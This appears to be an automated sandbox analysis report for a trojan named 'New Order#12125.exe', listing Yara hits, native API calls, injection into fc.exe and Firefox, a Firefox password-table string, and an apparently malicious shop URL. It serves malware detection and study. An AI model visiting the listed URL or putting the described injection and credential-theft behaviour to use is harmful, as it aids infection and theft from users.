              Source: fc.exe, 00000004.00000002.3864506422.000000000520A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3866047110.0000000006420000.00000004.00000800.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003EAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fc.exe, 00000004.00000002.3864506422.000000000539C000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.000000000403C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1to

              E-Banking Fraud

              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: initial sampleStatic PE information: Filename: New Order#12125.exe
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002BCB43 NtClose,0_2_002BCB43
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542B60 NtClose,LdrInitializeThunk,0_2_01542B60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01542DF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01542C70
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015435C0 NtCreateMutant,LdrInitializeThunk,0_2_015435C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01544340 NtSetContextThread,0_2_01544340
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01544650 NtSuspendThread,0_2_01544650
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BF0 NtAllocateVirtualMemory,0_2_01542BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BE0 NtQueryValueKey,0_2_01542BE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542B80 NtQueryInformationFile,0_2_01542B80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BA0 NtEnumerateValueKey,0_2_01542BA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AD0 NtReadFile,0_2_01542AD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AF0 NtWriteFile,0_2_01542AF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AB0 NtWaitForSingleObject,0_2_01542AB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D10 NtMapViewOfSection,0_2_01542D10
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D00 NtSetInformationFile,0_2_01542D00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D30 NtUnmapViewOfSection,0_2_01542D30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DD0 NtDelayExecution,0_2_01542DD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DB0 NtEnumerateKey,0_2_01542DB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C60 NtCreateKey,0_2_01542C60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C00 NtQueryInformationProcess,0_2_01542C00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CC0 NtQueryVirtualMemory,0_2_01542CC0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CF0 NtOpenProcess,0_2_01542CF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CA0 NtQueryInformationToken,0_2_01542CA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F60 NtCreateProcessEx,0_2_01542F60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F30 NtCreateSection,0_2_01542F30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FE0 NtCreateFile,0_2_01542FE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F90 NtProtectVirtualMemory,0_2_01542F90
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FB0 NtResumeThread,0_2_01542FB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FA0 NtQuerySection,0_2_01542FA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542E30 NtWriteVirtualMemory,0_2_01542E30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542EE0 NtQueueApcThread,0_2_01542EE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542E80 NtReadVirtualMemory,0_2_01542E80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542EA0 NtAdjustPrivilegesToken,0_2_01542EA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543010 NtOpenDirectoryObject,0_2_01543010
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543090 NtSetValueKey,0_2_01543090
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015439B0 NtGetContextThread,0_2_015439B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543D70 NtOpenThread,0_2_01543D70
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543D10 NtOpenProcessToken,0_2_01543D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03724340 NtSetContextThread,LdrInitializeThunk,4_2_03724340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03724650 NtSuspendThread,LdrInitializeThunk,4_2_03724650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722B60 NtClose,LdrInitializeThunk,4_2_03722B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03722BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03722BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03722BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AF0 NtWriteFile,LdrInitializeThunk,4_2_03722AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AD0 NtReadFile,LdrInitializeThunk,4_2_03722AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F30 NtCreateSection,LdrInitializeThunk,4_2_03722F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FE0 NtCreateFile,LdrInitializeThunk,4_2_03722FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FB0 NtResumeThread,LdrInitializeThunk,4_2_03722FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03722EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03722E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03722D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03722D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03722DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DD0 NtDelayExecution,LdrInitializeThunk,4_2_03722DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03722C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C60 NtCreateKey,LdrInitializeThunk,4_2_03722C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03722CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037235C0 NtCreateMutant,LdrInitializeThunk,4_2_037235C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037239B0 NtGetContextThread,LdrInitializeThunk,4_2_037239B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722B80 NtQueryInformationFile,4_2_03722B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AB0 NtWaitForSingleObject,4_2_03722AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F60 NtCreateProcessEx,4_2_03722F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FA0 NtQuerySection,4_2_03722FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F90 NtProtectVirtualMemory,4_2_03722F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722E30 NtWriteVirtualMemory,4_2_03722E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722EA0 NtAdjustPrivilegesToken,4_2_03722EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D00 NtSetInformationFile,4_2_03722D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DB0 NtEnumerateKey,4_2_03722DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C00 NtQueryInformationProcess,4_2_03722C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CF0 NtOpenProcess,4_2_03722CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CC0 NtQueryVirtualMemory,4_2_03722CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723010 NtOpenDirectoryObject,4_2_03723010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723090 NtSetValueKey,4_2_03723090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723D70 NtOpenThread,4_2_03723D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723D10 NtOpenProcessToken,4_2_03723D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E793B0 NtCreateFile,4_2_02E793B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E796B0 NtClose,4_2_02E796B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79610 NtDeleteFile,4_2_02E79610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79520 NtReadFile,4_2_02E79520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79820 NtAllocateVirtualMemory,4_2_02E79820
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFB760_2_015CFB76
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01585BF00_2_01585BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154DBF90_2_0154DBF9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152FB800_2_0152FB80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFA490_2_015CFA49
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C7A460_2_015C7A46
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01583A6C0_2_01583A6C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BDAC60_2_015BDAC6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01555AA00_2_01555AA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015ADAAC0_2_015ADAAC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B1AA30_2_015B1AA3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C1D5A0_2_015C1D5A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01513D400_2_01513D40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C7D730_2_015C7D73
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152FDC00_2_0152FDC0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01589C320_2_01589C32
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFCF20_2_015CFCF2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFF090_2_015CFF09
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01511F920_2_01511F92
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFFB10_2_015CFFB1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01519EB00_2_01519EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AA3524_2_037AA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B03E64_2_037B03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FE3F04_2_036FE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037902744_2_03790274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037702C04_2_037702C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037781584_2_03778158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378A1184_2_0378A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E01004_2_036E0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A81CC4_2_037A81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B01AA4_2_037B01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A41A24_2_037A41A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037820004_2_03782000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F07704_2_036F0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037147504_2_03714750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EC7C04_2_036EC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370C6E04_2_0370C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F05354_2_036F0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B05914_2_037B0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A24464_2_037A2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037944204_2_03794420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379E4F64_2_0379E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AAB404_2_037AAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A6BD74_2_037A6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EEA804_2_036EEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037069624_2_03706962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F29A04_2_036F29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037BA9A64_2_037BA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F28404_2_036F2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FA8404_2_036FA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E8F04_2_0371E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036D68B84_2_036D68B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03764F404_2_03764F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03710F304_2_03710F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03792F304_2_03792F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03732F284_2_03732F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FCFE04_2_036FCFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E2FC84_2_036E2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0376EFA04_2_0376EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F0E594_2_036F0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AEE264_2_037AEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AEEDB4_2_037AEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03702E904_2_03702E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037ACE934_2_037ACE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378CD1F4_2_0378CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FAD004_2_036FAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EADE04_2_036EADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03708DBF4_2_03708DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F0C004_2_036F0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E0CF24_2_036E0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03790CB54_2_03790CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036DD34C4_2_036DD34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A132D4_2_037A132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0373739A4_2_0373739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037912ED4_2_037912ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370B2C04_2_0370B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F52A04_2_036F52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037BB16B4_2_037BB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0372516C4_2_0372516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036DF1724_2_036DF172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FB1B04_2_036FB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A70E94_2_037A70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF0E04_2_037AF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F70C04_2_036F70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379F0CC4_2_0379F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF7B04_2_037AF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037356304_2_03735630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A16CC4_2_037A16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A75714_2_037A7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B95C34_2_037B95C3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378D5B04_2_0378D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E14604_2_036E1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF43F4_2_037AF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFB764_2_037AFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03765BF04_2_03765BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0372DBF94_2_0372DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370FB804_2_0370FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03763A6C4_2_03763A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFA494_2_037AFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A7A464_2_037A7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379DAC64_2_0379DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03735AA04_2_03735AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378DAAC4_2_0378DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03791AA34_2_03791AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370B9504_2_0370B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F99504_2_036F9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037859104_2_03785910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0375D8004_2_0375D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F38E04_2_036F38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFF094_2_037AFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFFB14_2_037AFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F1F924_2_036F1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F9EB04_2_036F9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A7D734_2_037A7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A1D5A4_2_037A1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F3D404_2_036F3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370FDC04_2_0370FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03769C324_2_03769C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFCF24_2_037AFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E61FD04_2_02E61FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5CE804_2_02E5CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5D0A04_2_02E5D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B0804_2_02E5B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B07F4_2_02E5B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E511E74_2_02E511E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B1C44_2_02E5B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B1D04_2_02E5B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E656804_2_02E65680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E638804_2_02E63880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6387B4_2_02E6387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E7BCD04_2_02E7BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E2F54_2_0349E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E7B34_2_0349E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E57B4_2_0349E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E4134_2_0349E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349CB134_2_0349CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349D8784_2_0349D878
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeCode function: 7_2_04DBCBFF7_2_04DBCBFF
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860758789_2_0000023F86075878
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F8607657B9_2_0000023F8607657B
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860762F59_2_0000023F860762F5
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F86074B139_2_0000023F86074B13
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860767B39_2_0000023F860767B3
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860764139_2_0000023F86076413
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 03737E54 appears 111 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 0375EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 03725130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 0376F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 036DB970 appears 280 times
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: String function: 0157EA12 appears 86 times
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: String function: 01557E54 appears 111 times
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: String function: 0158F290 appears 105 times
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: String function: 014FB970 appears 280 times
              Source: C:\Users\user\Desktop\New Order#12125.exe Code function: String function: 01545130 appears 58 times
              Source: New Order#12125.exe Static PE information: No import functions for PE file found
              Source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000002.1802265375.00000000017A1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1705156829.000000000144E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1702526408.000000000129F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: New Order#12125.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@16/10
              Source: C:\Windows\SysWOW64\fc.exe File created: C:\Users\user\AppData\Local\Temp\17O3k-2I
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\New Order#12125.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: fc.exe, 00000004.00000002.3852014344.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3852014344.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3852014344.00000000030F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: New Order#12125.exe Virustotal: Detection: 65%
              Source: New Order#12125.exe ReversingLabs: Detection: 71%
              Source: unknown Process created: C:\Users\user\Desktop\New Order#12125.exe "C:\Users\user\Desktop\New Order#12125.exe"
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\New Order#12125.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
